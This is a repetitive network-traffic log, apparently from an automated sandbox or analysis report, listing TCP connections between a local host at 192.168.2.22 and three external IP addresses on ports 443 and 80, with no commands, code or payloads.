            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
